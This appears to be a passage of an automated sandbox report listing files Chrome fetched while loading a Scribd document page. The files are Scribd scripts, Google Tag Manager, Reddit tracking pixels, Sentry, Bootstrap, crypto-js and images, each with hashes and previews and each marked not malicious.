                                                                                                                                                                                                                                                                                                                                                                                        Preview:"use strict";(self.webpackChunk_scribd_app_docpage=self.webpackChunk_scribd_app_docpage||[]).push([[806],{25806:(e,a,o)=>{o.r(a),o.d(a,{default:()=>t});var d=o(38544),l=o(96540),s=o(37594),c=o(78458);const t=(0,d.Ng)(null,((e,a)=>({docPageCloseModal:()=>e((0,c.JY)(a.id))})))((function(e){const a=(0,d.wA)();return l.createElement(s.ry,{docPageCloseModal:()=>{const a=document.querySelector(".auto__doc_page_shared_modals_modal .wrapper");a.classList.remove("entered"),a.classList.add("exited"),setTimeout((()=>{e.docPageCloseModal()}),200)},handleDownload:o=>{e.docPageCloseModal(),a((0,c.CU)(e.page,e.location,null,o))}})}))}}]);.//# sourceMappingURL=https://www.scribd.com/webpack/doc_page/806.acb1c9.js.map
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PNG image data, 149 x 198, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):7457
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.963129182699124
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:192:i7vC4NCKuAI5KZzxfH43nWx6n4RptLfJj:8BbmKzBanxn4tLt
                                                                                                                                                                                                                                                                                                                                                                                        MD5:C5E748DC120DB2239AE65BF0AD4195FD
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:329F44C95B37ADBB033AD35383EC650153C8C33A
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:F4F2CD562CB1A34D898A7E95525D8A6350E101FD2A18A0E91CD4AF11470BE658
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:68563B8DAA3E368A945D2530228235CE0ECA7CCA4E78A74A748E4D870103B4A19AB08072E035C2CA2284917452802ED43B75ECB5ECB2DE70F69D23CD51E6FA9A
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        Preview:.PNG........IHDR..............f2$....gAMA......a.....sRGB.........PLTE.....6...........8.....2...........2..*RZj..4..,........8...........2$$$&2B.....0.........../......)))...&%%......!!!.......................................%"".....................9?E........5......................100<<<......,+,.....ghh.............................]]]RX_........[bh.........07<*07.......................zzz...........MU[$2B...WXXrvz..........@@@.$*...767houAHO...~..... "%...............KQX6<C...W]c}.....$&)-3:.........#*3......2:@RSS.................GGG...GNV.........?EJ................................w~.EKPBDE.....binpsv................4....................R[dry......&...ooo...........bcd................KKK...444kkm*/1.....-<BH......QPP...NOO............................1PU[..~.....$.....2vvx..&..4..........4...MP......IDATx...L.....=n^.Q...y.}......8.s......".aW@.B..JC= u..Qj1hWY.............r..y..5..i..rR.^..a.yw..q.v.../..y...g..y.]..9.-:/.....9.E.T.._}8;.
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (23716)
                                                                                                                                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):363281
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.584188605730976
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3072:oNcy253OdmnxuKqfrWkad0DMRoIbpgADF8lTPfDfJ312KQmh9aRGPVRu6jfh22JN:K25duKqzWuEz+nR19aRGPVoQj/
                                                                                                                                                                                                                                                                                                                                                                                        MD5:C9B5B5F6871986D923CBEB1E49DBCE6C
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:AB534E1D60623C17A1FFBBFD544A19348DF405E6
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:6FC76855C3C305F9056DCDC754A5023B2ECAEDC9AA32D8C8114E420233616631
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:8045DDF9532A4425D4BD943A5ADE2488CECB5644DEE8D3847275CB7A9938DB76FE58E341A8BF853496D3B27486283CB4832FF58423AF467F49C69BA45499D593
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        URL:https://www.googletagmanager.com/gtm.js?id=GTM-KXQQWDG
                                                                                                                                                                                                                                                                                                                                                                                        Preview:.// Copyright 2012 Google Inc. All rights reserved.. . (function(w,g){w[g]=w[g]||{};. w[g].e=function(s){return eval(s);};})(window,'google_tag_manager');. .(function(){..var data = {."resource": {. "version":"155",. . "macros":[{"function":"__e"},{"function":"__u","vtp_component":"URL","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__gas","vtp_cookieDomain":"auto","vtp_doubleClick":true,"vtp_setTrackerName":false,"vtp_useDebugVersion":false,"vtp_useHashAutoLink":false,"vtp_decorateFormsAutoLink":false,"vtp_enableLinkId":false,"vtp_enableEcommerce":false,"vtp_trackingId":"UA-443684-29","vtp_enableRecaptchaOption":false,"vtp_enableUaRlsa":false,"vtp_enableUseInternalVersion":false,"vtp_enableGA4Schema":true},{"function":"__u","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__v","convert_case_to":1,"vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"cart"},{"function":"__awec","vtp_mode":"AUTO"
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (3273)
                                                                                                                                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):3352
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.226859630538864
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:96:PPj3KHtUdqaUQfvXZfvVUrUPnPj399HTW:Hj3KHtUd9UQXXZfvVUrUPPj39tW
                                                                                                                                                                                                                                                                                                                                                                                        MD5:E5371534986C029438DB8C25DD753BC0
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:87FA9B013B5A93771F962A929D718EAB343C5FEA
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:06D7B0C30BA6E895D61A27F84086FD87ED27D9F81831B1057965CDD0355A6DF5
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:810E5207F97CD20C57593519D489BBE12D8D19700658F61A8533CF5286BAD181FDD386DD726E586BFD5CEEBF739CCA5B43BC9C11B19E9F3564513D527153AC2E
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        URL:https://s-f.scribdassets.com/webpack/doc_page/452.fc7ddf.js
                                                                                                                                                                                                                                                                                                                                                                                        Preview:"use strict";(self.webpackChunk_scribd_app_docpage=self.webpackChunk_scribd_app_docpage||[]).push([[452],{55452:(e,t,a)=>{a.r(t),a.d(t,{default:()=>c});var o=a(40880),r=a(96540),l=a(38979),n=a(51336);function s(e,t,a){return(t=function(e){var t=function(e,t){if("object"!=typeof e||!e)return e;var a=e[Symbol.toPrimitive];if(void 0!==a){var o=a.call(e,t||"default");if("object"!=typeof o)return o;throw new TypeError("@@toPrimitive must return a primitive value.")}return("string"===t?String:Number)(e)}(e,"string");return"symbol"==typeof t?t:t+""}(t))in e?Object.defineProperty(e,t,{value:a,enumerable:!0,configurable:!0,writable:!0}):e[t]=a,e}class c extends n.A{constructor(e){super(e),s(this,"renderTitle",(()=>{const e=o.A.t("webpack.doc_page.src.App.Page.modals.LockShockRoadblockModal.LockShockRoadblockModal.problem_with_your_last_payment");return this.getModalTitleElement({title:e,className:"roadblock_title"})})),s(this,"renderDescription",(()=>o.A.t("webpack.doc_page.src.App.Page.modals.
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):32
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.390319531114783
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3:HYmpBth0tYY:4mpbgYY
                                                                                                                                                                                                                                                                                                                                                                                        MD5:EB3CE3190D8A58E048D35E620747D3A5
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:76B5B6461189F839B018EF5C785DB4836B818B7D
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:2D670E2962D8D805B95912CACA0822CE7C6913636BA40373C6E6AEA73CAC8457
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:08F9C680B09CC25919A91F8E080CFC517F7354F49759DDC8CF6FFEB5ADE2E46F80A866E7531B6EA97188A5E4647093350F91ED51254351C47BCE3488EF88A595
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAlKfJGCKiXSahIFDa0JrrESEAkZq1RVNyEPLRIFDUPzdjk=?alt=proto
                                                                                                                                                                                                                                                                                                                                                                                        Preview:CgkKBw2tCa6xGgAKCQoHDUPzdjkaAA==
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):42
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):2.9881439641616536
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3:CUXPQE/xlEy:1QEoy
                                                                                                                                                                                                                                                                                                                                                                                        MD5:D89746888DA2D9510B64A9F031EAECD5
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:D5FCEB6532643D0D84FFE09C40C481ECDF59E15A
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:EF1955AE757C8B966C83248350331BD3A30F658CED11F387F8EBF05AB3368629
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:D5DA26B5D496EDB0221DF1A4057A8B0285D15592A8F8DC7016A294DF37ED335F3FDE6A2252962E0DF38B62847F8B771463A0124EF3F84299F262ED9D9D3CEE4C
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        URL:https://alb.reddit.com/rp.gif?ts=1733522373808&id=t2_9t33vcn2&event=PageVisit&m.itemCount=&m.value=&m.valueDecimal=&m.currency=&m.transactionId=&m.customEventName=&m.products=&m.conversionId=&uuid=90ad4cc1-c7c0-404a-8932-712d98b9d875&aaid=&em=&external_id=&idfa=&integration=reddit&opt_out=0&sh=1280&sw=1024&v=rdt_b192616d&dpm=&dpcc=&dprc=
                                                                                                                                                                                                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........D.;
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (2175)
                                                                                                                                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):2316
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.159085782814747
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:48:W8WRFsPhd121LnjFm502/am139zmjfEHVQ/Om/RsucFNivRTu+:NCsJd12ZFo02/X139zmjyQmm/Rsucmvv
                                                                                                                                                                                                                                                                                                                                                                                        MD5:3C86C3663DC77BF9299D3A1DBF84B79E
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:DD56D82CC9DCD2BBE72F7B3F4033F81F1AA95279
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:F6D1C4AA4948CBB16037959ABB65DE33038714D3C1FCF977D90EB02A8E50814B
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:7D8B20F25610352DAA030A0D943C652BF205744298C9F5019C7B2018AF9BEEF223477926CB67706AC38E52733F644612629A3C47CF98563691B1E23D27C09324
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        URL:https://browser.sentry-cdn.com/7.19.0/rewriteframes.min.js
                                                                                                                                                                                                                                                                                                                                                                                        Preview:/*! @sentry/integrations 7.19.0 (1818483) | https://github.com/getsentry/sentry-javascript */.!function(t){var r={};const n=/^(\/?|)([\s\S]*?)((?:\.{1,2}|[^/]+?|)(\.[^./]*|))(?:[/]*)$/;function e(...t){let r="",n=!1;for(let e=t.length-1;e>=-1&&!n;e--){const i=e>=0?t[e]:"/";i&&(r=`${i}/${r}`,n="/"===i.charAt(0))}return r=function(t,r){let n=0;for(let r=t.length-1;r>=0;r--){const e=t[r];"."===e?t.splice(r,1):".."===e?(t.splice(r,1),n++):n&&(t.splice(r,1),n--)}if(r)for(;n--;n)t.unshift("..");return t}(r.split("/").filter((t=>!!t)),!n).join("/"),(n?"/":"")+r||"."}function i(t){let r=0;for(;r<t.length&&""===t[r];r++);let n=t.length-1;for(;n>=0&&""===t[n];n--);return r>n?[]:t.slice(r,n-r+1)}function s(t,r){let e=function(t){const r=n.exec(t);return r?r.slice(1):[]}(t)[2];return r&&e.substr(-1*r.length)===r&&(e=e.substr(0,e.length-r.length)),e}class c{static __initStatic(){this.id="RewriteFrames"}__init(){this.name=c.id}__init2(){this.t="app:///"}constructor(t={}){c.prototype.__init.call(this
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:gzip compressed data, truncated
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):27
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.169382490786664
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3:Ftt4ipq4Wln:XtrxWl
                                                                                                                                                                                                                                                                                                                                                                                        MD5:8C843FFB840DECAC646424269B22D78B
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:823D50FAA2E9D2D75CAEC02C2595C953F165F956
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:CF5E566DC08016A63E1667A2726699C3ADE378330F8E073CC4632D0D19B9F51E
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:C0C1F5624728CDBC57F55C77F6D59C53584F74731A25B8C2EC7C8CCE72725C7AB7A1E1266A8940F19E6C018D3E4A6FA36602987E7EC3680CFFE501A44289070C
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        Preview:...........................
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):86
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.779486743739521
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3:YTyLV/Vf1+xNVcSLQzRE9LduVB4:YWLV91iDLQmpdIB4
                                                                                                                                                                                                                                                                                                                                                                                        MD5:EA03273602AC31C0858FA2D9A1895526
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:4F8AFE25482A22C6858AF1F58E55D83F9DF9B854
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:98D77039EA9249B3DCE91AD7B467EE382F29DAA61213C3E2737BD4A8786C8801
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:77FF06E103CA553FAD14E5F865764CDA76777F83800C439ED91B22B26935146863F9D0C3BBBD3EE95E02C69A1A1C29D0C12A5D9B9D1D619CEEBCF1DCCB422238
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        URL:https://www.redditstatic.com/ads/conversions-config/v1/pixel/config/t2_9t33vcn2_telemetry
                                                                                                                                                                                                                                                                                                                                                                                        Preview:{"version_hash":"49267bce","url":"https://www.redditstatic.com/ads/49267bce/pixel.js"}
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PNG image data, 149 x 198, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):22143
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.98254340403135
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:384:8KgI7p4nhJYad8rJyaAaiKueBsTgC12wXLETRkpj6ubEM7swpAA0Javm699/Vf9:v7SnhiaiI+iKuoOgNw7E+jrE+rV0WbvH
                                                                                                                                                                                                                                                                                                                                                                                        MD5:4F1783D9F3B9377B08EC1279611F2E02
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:55739D33D0B7FBA0ACEFB92FEB34836AF2464F52
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:181FD5148E60A771DE2176963212746278DA6763455E79244DD353B2B7E6B09E
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:BEC2AB2AD7F165780C88379B05C0E1D50F11E8F54BA2F47DB6072BA737E1C23E5320CDCB92C83CFEFB21FA3F3FDA18D148DB7CB43AB5B1BA7289F36B3CDD0E79
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        Preview:.PNG........IHDR..............f2$....gAMA......a.....sRGB.........PLTE."#.A*..%.$*.&%."&.;*. -..7. )."%+;..4).*".<'.C*.3&.$#.$2)=...'.L*..-....K*....h=.:*.\5...1?.6K........R-.^5....N,.C*....'&.g<.2%..#.......?P.)5.-A.....\6...9C..3*.......pF...............KN.7:.))1E.........7R..|N.9,)2..W4....qJ....f;....$"....+77D.....C)....]9.......EC.dN...6L..f...........8@..................*C..r[...rP.g;*,.0@..||....8:....T,....69.xJ.....*1......H@3BM.6S..3).....JH....OW...8S.06....{|eZF...,=.....YH.F6z.......MT..J4......dN.he....b_.]S.cH~.......1K.......el....UAEA.....M;.R6.iJIF~....C<.JQ.O[....teAX.cw.lfZ^T.....x..MU.af..........t_......\_................d...ybm....~QmF4v.e...zcR........xeMi...........vf'(p...]F;.bhQw...........w......f;h.$ ...b$'.........H$.zU..`y....Pr....}~...l.....8Dz2GdXZ.....#... .IDATx...oH.i.....$...L#.....a..Bd..N.(.H..........o.H.K..l..PJbO0.&..z..N.7.F.....Z..)...0p..k_.=.zO.m]....^...&.d...<?......Q_..?..._....2...=.....\..
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (58876), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):58876
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.405683338218142
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:1536:buY9NdAkLYPFvFkxF94zPnSJpSFDKNo5/H:buQdApFoF94zPnSJpSFDP5/H
                                                                                                                                                                                                                                                                                                                                                                                        MD5:4328E910DE583AD53B3A7A76455AF005
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:E040010E5EF4121A3A163AACDC664D6AA4AFEC74
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:D4963B8AFEBFA0063B5D17B4C80F49BCE702A37EA5C9B91BB3C996BB9DEA4B60
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:F807BA8B0AE2D5387E93E292918EEB4D7D1AC7635566A38EE2E101FBE8A7C6C23E704770EFCB1401EB5D1385605CBFB15F0A840AC150770049D2A4D6CA9A0DFA
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        Preview:!function(){var t={6173:function(t,e,n){var r;t.exports=(r=r||function(t,e){var r;if("undefined"!=typeof window&&window.crypto&&(r=window.crypto),"undefined"!=typeof self&&self.crypto&&(r=self.crypto),"undefined"!=typeof globalThis&&globalThis.crypto&&(r=globalThis.crypto),!r&&"undefined"!=typeof window&&window.msCrypto&&(r=window.msCrypto),!r&&void 0!==n.g&&n.g.crypto&&(r=n.g.crypto),!r)try{r=n(2480)}catch(t){}var i=function(){if(r){if("function"==typeof r.getRandomValues)try{return r.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof r.randomBytes)try{return r.randomBytes(4).readInt32LE()}catch(t){}}throw new Error("Native crypto module could not be used to get secure random number.")},o=Object.create||function(){function t(){}return function(e){var n;return t.prototype=e,n=new t,t.prototype=null,n}}(),a={},c=a.lib={},u=c.Base={extend:function(t){var e=o(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (50758)
                                                                                                                                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):51039
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.247253437401007
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:768:E9Yw7GuJM+HV0cen/7Kh5rM7V4RxCKg8FW/xsXQUd+FiID65r48Hgp5HRl+:E9X7PMIM7V4R5LFAxTWyuHHgp5HRl+
                                                                                                                                                                                                                                                                                                                                                                                        MD5:67176C242E1BDC20603C878DEE836DF3
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:27A71B00383D61EF3C489326B3564D698FC1227C
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:56C12A125B021D21A69E61D7190CEFA168D6C28CE715265CEA1B3B0112D169C4
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:9FA75814E1B9F7DB38FE61A503A13E60B82D83DB8F4CE30351BD08A6B48C0D854BAF472D891AF23C443C8293380C2325C7B3361B708AF9971AA0EA09A25CDD0A
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        URL:https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js
                                                                                                                                                                                                                                                                                                                                                                                        Preview:/*!. * Bootstrap v4.1.3 (https://getbootstrap.com/). * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,h){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function s(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function l(r){for(var t=1;t<arguments.length;t++){var o=null!=arguments[t]?arguments[t]:{},e=Object.keys(o);"function"==typeof Object.getOwnPropertySymbols&&(e=e.concat(Object.getOwnPropertySymbols(o).filter(function(t){return Object.getOwnPropertyDescriptor(o,t).enum
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):17174
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):2.9129715116732746
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                                                                                                                                                                                                                                                                                                                                        MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (4852), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):4852
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.805857817958768
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:96:1gv6vV0qSkxO9D06lUUTz9NnSzZhFt8vf1dtzlTagjVwK:1dCqSF9Q6RX9hq0zBjVwK
                                                                                                                                                                                                                                                                                                                                                                                        MD5:C8C2E5C2ABE7DFF1090E034E12971179
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:6F77CC585611136B7DA58C3D1EF0D8B15F9805ED
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:CE41398AF91ED368FB98AA40544F4F4810C4CC53242D4418E4AC05768582556A
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:6AE8782FFF284B812B24B1A85BCEFD3755348A50BA3FB720FBD44170A24DE2F3AD09DCC74303B807E78DF43F774FFF06BD1ECC8E9B8C8AEE26AF91DF39901528
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
